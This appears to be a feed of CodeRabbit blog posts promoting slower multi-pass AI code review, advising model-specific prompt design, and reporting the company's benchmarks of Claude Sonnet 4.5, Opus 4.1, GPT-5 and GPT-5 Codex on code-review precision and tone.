Howon Lee — Wed, 05 Nov 2025 00:00:00 GMT

For as long as we’ve been building with machines, we’ve followed one core rule: faster is better. Lower latency, higher throughput, less waiting; that was gospel. Nobody wanted to wait 600ms for a button to respond or watch a spinner that lasts longer than their attention span. If it was slow, it was broken. Case closed. So naturally, when AI tools started creeping into our dev workflows, autocomplete, agents, copilots, you name it, the same principle applied. Make it fast. Make it feel instant. Make it look like ***magic***. But here’s the thing: AI isn’t magic. It’s inference. It’s pipelines and RAG and context and tool calls. It’s juggling messy context and probabilistic guesses. And if you want something smarter than glorified autocomplete, you need to build a pipeline of processes to provide scaffolding for that. Which takes time to process. Anything less and you’re basically just speedrunning stupid. And speed isn’t anything to brag about when your tool is just wrong faster. At CodeRabbit, we prioritize what we call Slow AI. And we have the guts to say what a lot of AI companies are too afraid to: We’re going to make you wait. (And you’ll thank us for it). ## AI dev tools are often fast, confident, and ***wrong*** If you've used an AI coding agent lately, you've probably seen it: a shockingly fast suggestion pops up almost as soon as you stop typing. It looks legit. But then… it fails silently. Or spectacularly. Or worse, it passes the test and breaks something two files over. Why? Because most AI dev tools today are optimized for one thing: speed. Type a few tokens and the model predicts the most statistically likely continuation not necessarily the correct one, not the secure one, not the one that actually understands what your app is doing. Just the next plausible blob of code. That’s fine for boilerplate. But for logic? For edge cases? For actual engineering? 
It’s kind of like hiring someone who talks fast and confidently in meetings but never reads the specs. Most of these tools don’t *read* context, at least not deeply. They might grab a few nearby lines, maybe the function name, but they rarely verify what they’re generating against the bigger picture. No issue cross-checking. No architecture-level awareness. No reasoning across files or use cases. If you want outputs that are thoughtful, testable, and context-aware, you need AI systems that *slow down*, zoom out, and actually engage with the problem. That’s what Slow AI does. And it turns out, when your AI takes the time to understand what it’s doing, it stops hallucinating and starts *actually* helping. ## **Why AI is better when it’s slow** At their core, large language models are statistical reasoning machines. They generate output by predicting what comes next based on probability, patterns, and (hopefully) the context you’ve given them. But here's the caveat most devs forget: good predictions take work. This is especially true when you're asking the model to do something complex like write logic, understand architecture, or reason across multiple steps. The quality of the output is often tied directly to the depth or stages of its inference. This is particularly true when you move beyond simple prompts and into multi-stage pipelines and agentic behavior. When an AI tool is verifying outputs, pulling in relevant files, checking for contradictions, or planning several actions ahead, it’s not just spitting out the next token… it’s *thinking*. Or, at least, performing a rough approximation of it. That kind of non-linear reasoning can’t be done in a single forward pass. It involves reflection, retrieval, planning, and sometimes even self-correction. These processes aren’t latency-friendly, they’re intelligence-friendly. In short: if you want AI to actually help on complex code, you have to let it cook. 
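To make the contrast with single-pass generation concrete, here is a toy sketch of a multi-pass flow in which draft comments are checked against retrieved context before anything is posted. It is purely illustrative: the function names, the two verification passes, and the sample data are all hypothetical, and a real pipeline would run far richer checks.

```python
from typing import Callable

# A verification pass takes a draft comment plus retrieved context
# (file path -> file contents) and returns True to keep the draft.
Verifier = Callable[[str, dict[str, str]], bool]


def has_content(draft: str, context: dict[str, str]) -> bool:
    # Drop empty or whitespace-only drafts.
    return bool(draft.strip())


def cites_retrieved_file(draft: str, context: dict[str, str]) -> bool:
    # Toy check: the comment must mention a file that was actually retrieved.
    return any(path in draft for path in context)


def multi_pass_review(
    drafts: list[str], context: dict[str, str], verifiers: list[Verifier]
) -> list[str]:
    # Keep a draft only if every verification pass accepts it.
    return [d for d in drafts if all(v(d, context) for v in verifiers)]


# Hypothetical drafts and retrieved context.
drafts = [
    "cache.py: eviction never runs when size == limit",
    "utils.py: unused import",
    "   ",
]
context = {"cache.py": "def evict(): ..."}

kept = multi_pass_review(drafts, context, [has_content, cites_retrieved_file])
print(kept)
```

Each extra pass adds latency, but it also removes comments that cannot be grounded in the code that was actually read.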
## Slow is the new smart: Why we let our AI think Slow AI is one term for what we’re talking about. But it could just as easily be called Comprehensive AI or Accurate AI or even *Actually* Helpful and Useful AI if we’re being honest. And it’s inextricably tied to one of the buzziest ideas in AI product design right now: context engineering. The more *relevant and parsed* info an AI knows about the problem, the better it performs, but that context has to be pulled in, parsed, prioritized and reasoned over. That kind of pipeline is the enemy of ultra-low latency AI… and ultra-low latency, in turn, is the enemy of accuracy. And that’s why our AI code reviews can take up to five minutes before you see the first comment. Don’t get us wrong, we’re not optimizing for slowness. You could get a review in three minutes or even one minute depending on the complexity of your codebase and PR. Our pipeline is complex because that’s what’s *required* to do the job our users need it to do. You don’t even want to *know* the number of concurrent processes we have going on at any time! But guess what? When we let our AI take its time using a non-linear, multi-pass pipeline with multiple review and verification agents, it generates less noise and more relevant code review comments than other tools. Non-linear reasoning isn’t fast. But it’s good. ## So, why do most AI tools choose *stupid over slow?* Well, first, Slow AI isn’t an option for every tool. If you’re asking an AI coding agent a question, for example, you’re not going to wait five minutes for it to reply. There’s an expectation of immediacy inherent in that exchange. But code reviews? No one expects their co-worker to immediately drop what they’re doing and start commenting on a PR when it’s submitted. So, they’re willing to accept a delay in a review from a bot as well. And they’re especially willing to accept that delay if that review saves them time by being more relevant.
But why do so many companies still prioritize low latency when their use cases don’t really require it? Well, we’ve been trained, and trained our users, to expect instant gratification. Click a button, get a dopamine hit. Type a function name, get a suggestion before you even think about it. Anything else feels broken, laggy, or like your startup forgot to pay its AWS bill. This has been drilled into us so hard that companies are out there actively choosing being wrong over being slow. And there’s something toxic and backwards about our development culture when folks do that. Because here’s the truth: the best AI tools don’t always feel fast. They feel thoughtful. Sometimes they pause. Sometimes they take an extra beat to reason through your prompt, retrieve relevant code, or validate their response. And that’s something worth waiting for. After all, no one is less likely to use OpenAI’s Deep Research feature because it takes up to 20 minutes to comb the internet for info to better answer your question. You just do something else while it’s processing and circle back. Slow doesn’t mean busted anymore, it means *smart*. If anything, speed is the bug when it comes to AI. If we want AI tools that actually add value to the development process, that requires a shift from responsiveness to reliability, from immediacy to insight. And for developers especially, that tradeoff makes sense. We believe that the most valuable apps in the next five years won’t be the ones that optimize for speed but the ones that optimize for intelligence. Who wants fast garbage over slow value? ## CodeRabbit’s mantra: Move slow and fix things At CodeRabbit, we don’t optimize our AI pipelines for speed at all costs like everyone else. We optimize for trust. That means embracing systems that take the time to understand your code, reason across context, and generate outputs that actually help you build better software. Yes, it’s slower than hammering out a quick prompt. 
But that extra time buys you clarity, coverage, and confidence. “**Move fast and break things**” was great for shipping MVPs. But when it comes to shipping *quality*, we believe in something else: Move slow and fix things. Let the AI read the room. Let it think before it speaks. And let it give you the kind of help you’d expect from a senior engineer, not just a really confident autocomplete. That’s the only way to break out of this backwards culture that prioritizes wrong AI over slow AI. **Want to try our reviews out? Get a** [**14-day free trial here!**](https://app.coderabbit.ai/login???free-trial)

The end of one-sized-fits-all prompts: Why LLM models are no longer interchangeable

Nehal Gajraj — Fri, 24 Oct 2025 00:00:00 GMT

For developers and product builders, one assumption has guided the last few years of LLM application development. To improve your product, just swap in the latest frontier large language model. Flip a single switch and your tool’s capabilities level up. But that era is over. We’re now seeing that new models like Anthropic’s Claude Sonnet 4.5 and OpenAI’s GPT-5-Codex have diverged in fundamental ways. The choice of which model to use is no longer a simple engineering decision but a critical product decision. Flip that switch today… and the very texture of your product changes. The one-size-fits-all model era is over; the model you choose now expresses something integral about what your product is and does, as well as how it works. Whether you want it to or not. In this blog, we’ll explore three surprising takeaways from this new era: why your LLM is now a statement about your product, how models now have distinct personalities and styles, and why your prompts now have to evolve from monolithic instructions to adaptive systems. ## Takeaway 1: LLM choice is now a statement about your product Choosing a model is no longer a straightforward decision where the main consequence of your choice is having to implement a new API. It is now a product decision about the user experience you want to create, the failure modes you can tolerate, the economics you want to optimize for, and the metrics you want to excel in. Models have developed distinct “personalities,” ways of reasoning, and instincts that directly shape how your product feels and behaves, in ways that go beyond whether its output is technically right or wrong. Choose a different model and everything from what your tool is capable of to how it communicates with your users is significantly different.
So, in a world where traditional benchmarks that primarily or exclusively measure quantitative aspects of a model’s performance are no longer enough, what can you turn to for the data you need to chart your product’s direction? You could survey your team or your users or conduct focus groups, but that could lack objectivity if you don’t do it in a rigorous manner. To make this choice objective for our team, we focused on creating an internal [North Star metrics matrix](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning) at CodeRabbit. Our metrics don’t just look at raw performance or accuracy. We also take into account readability, verbosity, signal-to-noise ratios, and more. These kinds of metrics shift the focus from raw accuracy or leaderboard performance to what matters to our product and to our users. For example, a flood of low-impact suggestions, even if technically correct, burns user attention and consumes tokens. A theoretically “smarter” model can easily create a worse product experience if the output doesn’t align with your users’ workflow. I would strongly recommend creating your own North Star metrics to better gauge whether a new model meets your product’s and users’ needs. These shouldn’t be static metrics but should be informed by user feedback and user behavior in your product and evolve over time. Your goal is to find the right list of criteria to measure that predict your users’ preferences. What you’ll find is that the right model is the one whose instincts match the designed product behavior and your users’ needs, not the one at the top of any external leaderboard. ## Takeaway 2: Frontier models have divergent ‘personalities’ Models are (now more than ever) “**grown, not built,**” and as a result, the latest generation has developed distinct instincts and behaviors. Different post-training cookbooks have fundamentally changed the direction of each model class.
A prompt that works perfectly for one model will not work the same in another. Their fundamental approaches to the same task have diverged. One powerful analogy that drives this point home is to think of the models as different professional archetypes. Sonnet 4.5 is like a meticulous accountant turned developer; meanwhile, GPT-5-Codex is an upright ethical coder, GPT-5 is a bug-hunting detailed developer, and Sonnet 4 was a hyper-active new grad. The GPT-5 model class would make logical jumps further out in the solution space compared to the Claude model class, which tends to stay near the prompt itself. Which model is right for your use case and product depends entirely on what you want your product to achieve. At CodeRabbit, we take a methodical approach to model evaluation and characterization. We then use this data to improve how we prompt and deploy models, ensuring we are always using the right model for each use case within our product. To give you an example of how we look at the different models, let’s compare Sonnet 4.5 and GPT-5-Codex. Based on extensive internal use and evals, we characterized Sonnet 4.5 as a “**high-recall point-fixer,**” aiming for comprehensive coverage. In contrast, GPT-5-Codex acts as a “**patch generator,**” preferring surgical, local changes. These qualitative differences translate into hard, operational differences.

| Dimension | Claude Sonnet 4.5 | GPT-5-Codex |
| --- | --- | --- |
| Default Word Choice | “Critical,” “Add,” “Remove,” “Consider” | “Fix,” “Guard,” “Prevent,” “Restore,” “Drop” |
| Example-Efficiency | Remembers imperatives; benefits from explicit rules | Needs fewer examples; follows the formatting on longer context without additional prompting |
| Thinking Style | More cautious, catches more bugs but not as many of the critical ones | Variable or elastic, less depth when not needed without need to reiterate the rules. Catches more of the hard-to-find bugs |
| Behavioral Tendencies | Wider spray of point-fixes, more commentary and hedging, inquisitive, more human-like review, finds more critical and non-critical issues | Verbose research-style rationales, notes on second-order effects to code, compact and balanced towards a code reviewer |
| Review Comment Structure | What’s wrong, why it’s wrong, concrete fix with code chunk | What to do, why do it, concrete fix with effects and code chunk |
| Context Awareness | Aware of its own context window, tracks token budget, persists/compresses based on headroom | Lacks explicit context window awareness (like cooking without a clock) |
| Verbosity | Higher, easier to read, double the word count | Lower, harder to read, information-dense |

## Takeaway 3: End of an era. Prompts are no longer monoliths

Because the fundamental behaviors of models have diverged, a prompt written for one model will not work “as is” on another anymore. For example, a directive-heavy prompt designed for Claude can feel over-constrained on GPT-5-Codex, and a prompt optimized for Codex to explore deep reasoning behavior will likely underperform on Claude. That means that the era of the monolithic, one-size-fits-all prompt is over. So, what does that mean for engineering teams who want to switch between models or adopt the newest models as they’re released? It means even more prompt engineering! But before you groan at the thought, there are some hacks to make this easier.

### The rise of prompt subunits

The first practical solution we’ve found at CodeRabbit is to introduce “**prompt subunits.**” This architecture consists of a model-agnostic core prompt that defines the core tasks and general instructions. This is then layered on top of smaller, model-specific prompt subunits that handle style, formatting, and examples, and which can be customized to individual models.
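As a rough illustration of the prompt-subunit idea, the sketch below composes one shared core prompt with a small per-model subunit. It is an assumption-laden sketch, not CodeRabbit's prompts: the dictionary keys are placeholder labels rather than real API model identifiers, the prompt wording is invented, and placing the core text before the subunit is an arbitrary choice.

```python
# Model-agnostic core: the task and general instructions (hypothetical wording).
CORE_PROMPT = (
    "You are a code reviewer. Review only the lines changed in the diff "
    "and report real bugs with a concrete fix."
)

# Model-specific subunits: style, formatting, and examples only.
# Keys are placeholder labels, not real API model identifiers.
SUBUNITS = {
    "claude-sonnet-4.5": (
        "DO keep each comment to one issue. DO NOT comment outside the diff."
    ),
    "gpt-5-codex": (
        "Keep comments compact and aligned with the review goals above."
    ),
}


def build_prompt(model: str) -> str:
    # Combine the shared core with the subunit for this model, if one exists.
    subunit = SUBUNITS.get(model)
    if subunit is None:
        return CORE_PROMPT
    return f"{CORE_PROMPT}\n\n{subunit}"


print(build_prompt("claude-sonnet-4.5"))
```

Keeping the core text identical across models means a change to task instructions is made once, while style tuning for a new model only touches its own subunit.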
When it comes to Codex and Sonnet 4.5, the implementation details for these subunits are likely to be starkly different. We’ve found a few tricks from our prompt testing with both models that we would like to share: * **Claude:** Use strong language like "DO" and "DO NOT." Anthropic models pay attention to the latest information in a system prompt and are excellent at following output format specifications, even in long contexts. They prefer being told explicitly what to do. * **GPT-5:** Use general instructions that are clearly aligned. OpenAI models’ attention decreases from top to bottom in a system prompt. These models may forget output format instructions in long contexts. They prefer generic guidance and tend to "think on guidance," demonstrating a deeper reasoning process. ### User feedback and evals The second solution is to implement **continuous updates driven by user feedback and internal evaluations.** The best practice for optimizing an AI code-review bot or, for that matter, any LLM application isn’t using an external benchmark; it’s checking to see if users accept the output. Evals are more important than ever, but they have to be designed more tightly around user acceptability than around raw performance: one model might be technically correct significantly more often than another yet drown the user in nitpicky, verbose comments, diluting its value. By measuring the metrics that matter (acceptance rate, signal-to-noise ratio, p95 latency, and cost, among others) and tuning prompts in small steps, you keep the system aligned with user expectations and product goals. The last thing you want is great quantitative results on benchmarks and tests but low user acceptance. ## Conclusion This shift from one-size-fits-all prompt engineering to a new model-specific paradigm is critical. The days of brittle, monolithic prompts and plug-and-play model swaps are over.
Instead, modular prompting, paired with deliberate model choice, gives your product resilience. The ground will keep shifting as models evolve, so your LLM stack and prompts shouldn’t be static. Treat it like a living system. Tune, test, listen, repeat. Also, be sure to check out our published detailed benchmarks on how the latest models behave in production. That gives you more data on what to expect from them. * [GPT-5 Codex: How it solves for GPT-5's drawbacks](https://www.coderabbit.ai/blog/gpt-5-codex-how-it-solves-for-gpt-5s-drawbacks) * [Claude Sonnet 4.5: Better performance but a paradox](https://www.coderabbit.ai/blog/claude-sonnet-45-better-performance-but-a-paradox) * [Benchmarking GPT-5: Why it’s a generational leap in reasoning](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning) ***Try CodeRabbit with a*** [***14-day free trial.***](https://coderabbit.link/rk7tdeC)

Claude Sonnet 4.5: Better performance but a paradox

David Loker — Fri, 03 Oct 2025 00:00:00 GMT

Sonnet 4.5 is Anthropic’s newest Claude model and in our code review benchmark, it feels like a paradox: more capable, more cautious, and at times more frustrating. It catches bugs Sonnet 4 missed, edges closer to Opus 4.1 in coverage, and even surfaces a handful of unexpected critical issues off the beaten path. Yet, it hedges, it questions itself, and it sometimes sounds more like a thoughtful colleague than a decisive reviewer. The data shows real progress: 41.5% of Sonnet 4.5’s comments were Important vs. only 35.3% of Sonnet 4’s. But the tone and texture of those comments raise deeper questions about what we want in an AI reviewer. And then there’s the kicker: Sonnet 4.5 gets you close to Opus-level performance at a fraction of the price, making it a pragmatic sweet spot for teams reviewing code at scale. Sonnet 4.5 thinks aloud and still delivers decisive fixes, but some of its comments are framed as vague “conditional” warnings that may be harder for some readers to parse. Let’s dive into our benchmark. ## **Benchmark: What we looked for** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5523f129368b21348aad755d685c26b418a161a539975bf84a5914b9a456715e_71e6889ff7.png) We evaluated Sonnet 4.5, Sonnet 4, and Opus 4.1 across 25 difficult real-world pull requests containing known critical bugs (ranging from concurrency and memory ordering to async race conditions and API misuse). A model “passed” a PR if it produced at least one comment directly on the critical issue. We measured coverage (S@25), precision (comment PASS rate), and signal-to-noise ratio. For signal-to-noise we focus on **Important comments** (these are the comments that matter most). They include: * **PASS comments** that correctly addressed the known critical bug in the PR. * **Other important comments** that did not solve the tracked issue, but still flagged a truly Critical or Major bug elsewhere.
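As a rough illustration of how these three metrics relate, the sketch below computes them from labeled comments. It is a minimal sketch under stated assumptions, not our benchmark harness: the `Comment` record, its field names, and the toy data are all hypothetical.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Comment:
    """One review comment with its benchmark labels (hypothetical schema)."""

    pr_id: int
    is_pass: bool                     # directly addresses the PR's known critical bug
    is_other_important: bool = False  # flags a different Critical or Major bug


def coverage(comments: list[Comment], total_prs: int) -> float:
    """Share of PRs with at least one PASS comment (S@25 when total_prs is 25)."""
    passed_prs = {c.pr_id for c in comments if c.is_pass}
    return len(passed_prs) / total_prs


def precision(comments: list[Comment]) -> float:
    """Comment PASS rate: PASS comments divided by all comments."""
    if not comments:
        return 0.0
    return sum(c.is_pass for c in comments) / len(comments)


def important_share(comments: list[Comment]) -> float:
    """Share of comments that are PASS or flag another significant bug."""
    if not comments:
        return 0.0
    important = sum(c.is_pass or c.is_other_important for c in comments)
    return important / len(comments)


if __name__ == "__main__":
    # Toy data: 4 PRs, 5 comments; PR 4 received no comments at all.
    toy = [
        Comment(pr_id=1, is_pass=True),
        Comment(pr_id=1, is_pass=False),
        Comment(pr_id=2, is_pass=False, is_other_important=True),
        Comment(pr_id=3, is_pass=True),
        Comment(pr_id=3, is_pass=True),
    ]
    print(coverage(toy, total_prs=4))  # 0.5
    print(precision(toy))              # 0.6
    print(important_share(toy))        # 0.8
```

Note that coverage is counted per PR while precision and Important share are counted per comment, which is why a model can cover many PRs and still have a low signal-to-noise ratio.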
## **Scoreboard - Sonnet 4.5 gets closer to Opus 4.1 in performance** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b04e4909635ced6c0dca2c97cb9aef281cff77d2529a327fbac3277258a4fa1d_047f0ccd48.png) The results were mixed: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0cad361df088910b6ee8e94eb35f7b5a0fc0ac874776eb3be4ed503bafc24330_968dc1e3cc.png) * **Coverage:** Sonnet 4.5 closes much of the gap between Sonnet 4 and Opus 4.1 and lands far ahead of Sonnet 4. * **Precision:** Opus 4.1 still produces the cleanest, most reliable actionable comments, which is to be expected given that it’s a more expensive model. * **Important share (i.e., percentage of comments flagging a significant issue):** With stricter criteria, Sonnet 4.5 lands at just over 41% Important share. That means about 4 in 10 of its comments either solved the key bug or flagged another truly significant issue. Opus 4.1 leads here at 50%, with Sonnet 4 at ~35%. ## **Style and tone: Sonnet 4.5 is focused on hedging** Sonnet 4.5’s comments patch the code, but they do so in a less confident tone than Opus 4.1’s, though still a more confident one than Sonnet 4’s. **Patches present:** * 87% of Sonnet 4.5’s actionable comments included a code block or diff patch, similar to Sonnet 4 (90%) and Opus 4.1 (91%). * The difference is in style: Opus’s diffs read like surgical fixes, while Sonnet 4.5 often couches them in exploratory text. It “suggests” or “considers” changes rather than asserting them. **Hedging language:** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e9cdb33ac138a3545b50a8f7da070a6847c59eccb70cec4c32107701494a89c9_8553321772.png) * Sonnet 4.5 hedges in **34%** of actionable comments, using words like *might*, *could*, *possibly*.
For example: * “**Unnecessary allocation: cache is never used.** The constructor allocates 4KB of memory that is never utilized … **Consider removing** the cache\_buffer.” * “**Remove the empty try/except block.** … likely a placeholder” * Opus 4.1 is steady at ~28%. Sonnet 4 sits slightly lower at ~26%. * This hedging creates an “interrogative” tone: Sonnet 4.5 sometimes feels like it’s thinking out loud with you, rather than delivering verdicts. **Confident language:** * Sonnet 4.5 balances that hedging with higher confidence markers (**39%**) than Sonnet 4 (18%) or Opus 4.1 (23%). For example: * “**Critical: Missing self. prefix breaks all API methods.** All subsequent methods will raise AttributeError until this is corrected.” * “**Potential integer overflow.** optimization\_cycle\_count increments unbounded … this **will** overflow after ~414 days of runtime.” * In other words, it swings between caution and certainty more dramatically. **Signal-to-noise:** * Sonnet 4.5 improved precision over Sonnet 4, but still produced more “minor” off-target notes than Opus. However, when you count its true Important comments—PASS comments plus a small number of high-confidence off-EP issues—it lands at **41.5% Important share**. Opus 4.1 is still the gold standard Anthropic model at ~50%. ## **What Sonnet 4.5 is good at** Across the PRs we tested Sonnet 4.5 with, we saw some clear areas where it stood out. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/371865961ce37e017e5d647a755a5de76597fa38fdeb79119e664b63cc569b77_cb9542ec58.png) * **Concurrency bug-finding:** Sonnet 4.5 nailed **C++ atomics and condvar misuses** with clean, actionable diffs. * **Consistency checks:** It reliably flagged distributed state mismatches across services. * **Extra bug surfacing:** It did identify additional Critical issues not originally under evaluation, though fewer than initially expected under a stricter rubric. 
As Anthropic markets Sonnet 4.5, they emphasize “hybrid reasoning” and “long horizon” planning. In practice, that shows up as more willingness to chase down side-paths in the code and note real but untracked issues. ## **Sonnet 4.5: Hits a price vs. performance sweet spot** One of the biggest advantages of Sonnet 4.5 is its price-to-performance ratio. While Opus 4.1 remains Anthropic's flagship model in raw capability, it also comes at a significantly higher cost. Sonnet 4.5 narrows the gap in coverage and important bug-finding while staying far more cost-efficient to run. For many teams, that balance of close to Opus-level results at a fraction of the price is what makes Sonnet 4.5 the most pragmatic choice. ## **Sonnet 4.5 weaknesses** If you use Sonnet 4.5, it’s critical to be aware of its weaknesses. These include: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d53afd627bd885ebd0b7c5534731e63a5932d211a9cff66e3eabe444a5317221_2664e6b1eb.png) * **Deadlock coverage:** Like Sonnet 4 and even Opus, it still struggles to trace complex lock ordering. * **Verbosity and hedging:** Many comments run long, caveated, or uncertain. Compare this to GPT-5 Codex, which in our earlier work wrote comments that “read like patches” with crisp directness. For example, with GPT-5 Codex: * **Lock ordering / deadlock:** “Reorder the lock acquisitions to follow a consistent hierarchy. This prevents circular wait deadlocks.” * **Regex catastrophic backtracking:** “Remove the nested quantifier to avoid catastrophic backtracking.” * **Precision gap:** At 35% comment-level precision and a 41.5% Important share, it’s better than Sonnet 4 but well short of Opus 4.1. ## **Sonnet 4.5 verdict** Sonnet 4.5 feels less like a teacher writing in red pen and more like a thoughtful colleague at your side: pointing out possible issues, often right, occasionally over-hedged, and sometimes spotting things you didn’t know were there.
That style is a double-edged sword in review. On one hand, developers may appreciate the extra critical issues it flags. On the other, when the task is “please catch this bug,” Opus 4.1 is still sharper. ## **Closing thoughts** Anthropic positioned Sonnet 4.5 as a step toward agentic reasoning and computer use. In code review, that reasoning shows up in richer, more cautious, and more wide-ranging comments. For teams: * If you value decisive, patch-like feedback, Opus 4.1 (or GPT-5 Codex) still sets the bar. * If you want a reviewer that finds critical issues anywhere they lurk, even beyond the tracked bug, Sonnet 4.5 has surprising upside. * And if you care about pragmatic price-to-performance, Sonnet 4.5 may be the smartest choice: close to Opus’s accuracy at a fraction of the cost. Either way, Sonnet 4.5 changes the texture of reviews. It feels more human—not always cleaner, but more inquisitive, more hedged, sometimes more *right* in the places you weren’t looking.

GPT-5 Codex: How it solves for GPT-5's drawbacks

David Loker — Tue, 30 Sep 2025 00:00:00 GMT

CodeRabbit’s code reviews help developers fix bugs and ship code. We recently wrote about [benchmarking GPT-5](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning) and opined that the model was a generational leap in reasoning for our use case of AI code reviews. As we rolled out to our wider user base, we observed that the signal-to-noise ratio (SNR) dipped, and users felt the reviews were too pedantic. The release of GPT‑5 Codex, plus the product changes we made (severity tagging, stricter refactor gating, better filtering), brings our signal-to-noise ratio back without sacrificing the ability to find the hard bugs. On our refreshed hard 25 PR set, GPT-5 Codex delivers about 35% higher per-comment precision than GPT‑5, maintains essentially the same bug coverage at the error-pattern level, and cuts roughly a third of the comment volume. Combine that with the lower latency of the GPT-5 Codex model and the experience feels snappier and more focused. ## **What we measured (and why)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/14bb43e19c57fcb839e5cdf4faedb6c3eb7839a28c8207dd71324c13829e54a9_e774147c3f.png) When testing GPT-5 Codex, we ran a fresh “hard 25” suite of OSS PRs (slightly tougher than [the previous post](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning)). These are 25 of the most difficult pull requests from our dataset. These PRs represent real-world bugs that span: * Concurrency issues (e.g. TOCTOU races, incorrect synchronization) * Object-oriented design flaws (e.g. virtual call pitfalls, refcount memory model violations) * Performance hazards (e.g. runaway cache growth, tight loop stalls) * Language-specific footguns (e.g.
TypeScript misuses, C++ memory order subtleties) We evaluated the following models: * **GPT‑5 Codex** * **GPT‑5** * **Claude** (Sonnet 4 and Opus‑4.1) ## What we looked for We gave each of the models a score based on how they performed on these factors: * **EP (Error Pattern).** The specific underlying defect seeded in a PR (e.g., lost wakeup on a condition variable, inconsistent lock order, logic bug hidden in boolean soup). * **EP PASS/FAIL (per PR).** PASS if the model left at least one comment that directly fixes or credibly surfaces that PR’s EP. If it left no comment on that PR, it is counted as FAIL for that PR. * **Comment PASS/FAIL (per comment).** PASS if the comment directly fixes or credibly surfaces the EP, otherwise FAIL. * **Per comment precision.** PASS comments ÷ all comments. This is our operational SNR for this dataset. * **Important share.** Every PASS is Important. Comments that do not solve the EP but still flag a genuine critical or major bug (like a use after free, double free, lost wakeup, memory leak, null deref, path traversal, catastrophic regex) are also Important. Everything else is Minor. ## **Scoreboard - Codex improves signal-to-noise** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/337f396f423d63deda780f37275df808b6c1e8732255f730d8b870e251537b89_35e54bb5f7.png) **Takeaway:** Codex finds essentially the same EPs as GPT‑5 but does it with fewer, tighter comments, so the signal-to-noise ratio is improved. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/64871e695a5dba0ff7c756779d8974487e91c94ea12c5dfa7a1f4dec7fe09299_0119d66acc.png) **What this means:** Codex covered 20 of the 25 PRs (the other 5 count as uncovered fails). Despite fewer comments overall, Codex passed slightly more EPs (16 vs. 15) and landed far more Important comments. Over half its comments are either direct hits on the EP seeded in that PR or flag other genuine critical or major bugs.
GPT‑5 and Claude trailed in precision and Importance share at about 40%. **The verdict: Same EP coverage, less noise:** Codex retains GPT-5’s bug finding power but trims the chatter with about 32% fewer comments than GPT‑5 (54 vs. 79) and about 35% higher per comment precision (46.3% vs. 34.2%). Claude looks similar to GPT‑5 on coverage but is chattier, with lower precision. ## **Style and structure (why Codex reads like a patch)** Codex replies are consistently action forward (diffs almost always included) and low hedge. That lines up with what reviewers want: suggestions that translate directly into a patch. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b88774d9af028d2604ca7cdffae2a793244149ea29bdeaaef065a1c36b0d522f_bc96f14bb9.png) ## **The kinds of bugs Codex is good at** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cda620117d7bfcd6beda7e2b40ade94a4644917e35af621e69bdc19a289db716_ac3d2e7243.png) Across the suite, all models did well on concurrency and synchronization, but Codex stood out for: 1. **Condition variable misuse and lost wakeups.** Codex proposes the canonical patterns (wait under lock, check predicate in a loop) and supplies concrete diffs. 2. **Lock ordering and deadlocks.** It calls out inconsistent acquisition order and suggests a lock hierarchy or moving work outside critical sections, again with actionable edits. 3. **Subtle API and performance traps.** Examples include catastrophic regex backtracking and memory model orderings. Codex pinpoints and patches them cleanly. ## **Why GPT‑5 felt noisier, and how we fixed that** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f6a9601e10306e26d2f8916a9efc9a012118bea8ae7f57e8336594671ed0def0_6d4d9d9c1f.png) **What we saw:** When we moved from Sonnet and Opus to GPT‑5 our total comments per review nearly doubled. 
Even though hallucinations fell to under 1% and negative tone fell to under 1%, the acceptance rate (share of comments judged helpful) declined significantly relative to its baseline prior to the adoption of GPT-5. **What changed with Codex:** With GPT‑5 Codex plus some product changes we’ve implemented, our acceptance climbed back to prior levels while overall comment volume stayed higher than the pre-GPT‑5 era. Put simply: our tool is now back to its prior helpfulness level, while still finding as many real issues as GPT-5. Two product levers helped with this: 1. **We created severity and review type tags, front and center** * **Review Types:** We created review types to allow users to self-select what kinds of comments they wanted to read including: ⚠️ Potential issue, 🛠️ Refactor suggestion, 🧹 Nitpick (nitpicks are hidden unless you opt into *Assertive* mode) * **Severity:** We now tag comments by severity to better signal which matter more than others. Our tags are: 🔴 Critical, 🟠 Major, 🟡 Minor, 🔵 Trivial, ⚪ Info * We always show bugs (Critical, Major, Minor) but don’t always show other types of comments. Refactors show only if the model marks them as essential. Users who want everything can still switch to *Assertive* mode. 2. **We implemented stricter filtering and aggregation** * We collapse duplicative notes and filter out “nice to have” suggestions unless they have clear ROI for the user. The result: fewer, denser comments, and fewer reasons to tune out. ## **Latency: Fast matters & Codex is faster** A five minute review is fine. Thirty minutes is not. GPT‑5’s “always think hard” style significantly increased time to first token and overall review time. But we shipped several pipeline optimizations recently and Codex helps further reduce the latency that GPT-5 introduced. Codex’s variable or elastic thinking uses less depth when it is not needed, improving time to first output and end-to-end review time in practice. 
